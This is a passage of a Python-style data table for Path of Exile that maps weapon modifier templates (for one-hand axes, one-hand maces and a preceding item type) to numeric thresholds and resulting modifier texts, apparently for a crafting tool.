"+#% to Fire Resistance": [(35, '(2 - 3) to Fire Resistance'), (100, '(4 - 5) to Fire Resistance')],
"+#% to Fire and Cold Resistances": [(34, '(2 - 3) to Fire Resistance\n(2 - 3) to Cold Resistance'), (100, '(4 - 5) to Fire Resistance\n(4 - 5) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(34, '(2 - 3) to Fire Resistance\n(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Fire Resistance\n(4 - 5) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(30, '2 to Global Critical Strike Multiplier'), (100, '(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(35, '(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Lightning Resistance')],
"+#% to Melee Critical Strike Multiplier": [(35, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to all Elemental Resistances": [(28, '(2 - 3) to Fire Resistance\n(2 - 3) to Cold Resistance\n(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Fire Resistance\n(4 - 5) to Cold Resistance\n(4 - 5) to Lightning Resistance')],
"Always Freezes Enemies on Hit": [(7, 'Always Freezes Enemies on Hit'), (50, 'Always Freezes Enemies on Hit')],
"Attacks have #% chance to cause Bleeding": [(8, 'Attacks have (1 - 2)% chance to cause Bleeding'), (50, 'Attacks have 3% chance to cause Bleeding')],
"Damage Penetrates #% Cold Resistance": [(2, '(2 - 3)% increased Cold Damage'), (5, '(4 - 5)% increased Cold Damage')],
"Damage Penetrates #% Elemental Resistances": [(2, '(2 - 3)% increased Elemental Damage'), (5, '(4 - 5)% increased Elemental Damage')],
"Damage Penetrates #% Fire Resistance": [(2, '(2 - 3)% increased Fire Damage'), (5, '(4 - 5)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(2, '(2 - 3)% increased Lightning Damage'), (5, '(4 - 5)% increased Lightning Damage')],
"Minions deal #% increased Damage": [(42, 'Minions deal (2 - 3)% increased Damage'), (100, 'Minions deal (4 - 5)% increased Damage')],
"Minions have #% increased Attack Speed": [(15, 'Minions have (1 - 2)% increased Attack Speed'), (50, 'Minions have 3% increased Attack Speed')],
"Minions have #% increased Cast Speed": [(15, 'Minions have (1 - 2)% increased Cast Speed'), (50, 'Minions have 3% increased Cast Speed')],
"Minions have #% increased maximum Life": [(30, 'Minions have (2 - 3)% increased maximum Life'), (100, 'Minions have (4 - 5)% increased maximum Life')],
"Minions have +#% Chance to Block Attack Damage": [(8, 'Minions have (2 - 3)% increased maximum Life'), (50, 'Minions have (4 - 5)% increased maximum Life')],
"Minions have +#% to all Elemental Resistances": [(25, 'Minions have 3 to all Elemental Resistances'), (100, 'Minions have (4 - 5) to all Elemental Resistances')],
"Totems gain +#% to all Elemental Resistances": [(25, 'Totems gain 3 to all Elemental Resistances'), (100, 'Totems gain (4 - 5) to all Elemental Resistances')],
},
"One Hand Axe": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(30, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(10 - 12) to all Attributes\n(5 - 10)% chance to gain an Endurance Charge on Kill'), (100, '(5 - 10)% chance to gain a Frenzy Charge on Kill')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, 'Adds (1 - 2) to (3 - 4) Cold Damage to Attacks with this Weapon per 10 Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (1 - 2) to (3 - 4) Fire Damage to Attacks with this Weapon per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
"One Hand Mace": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(30, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
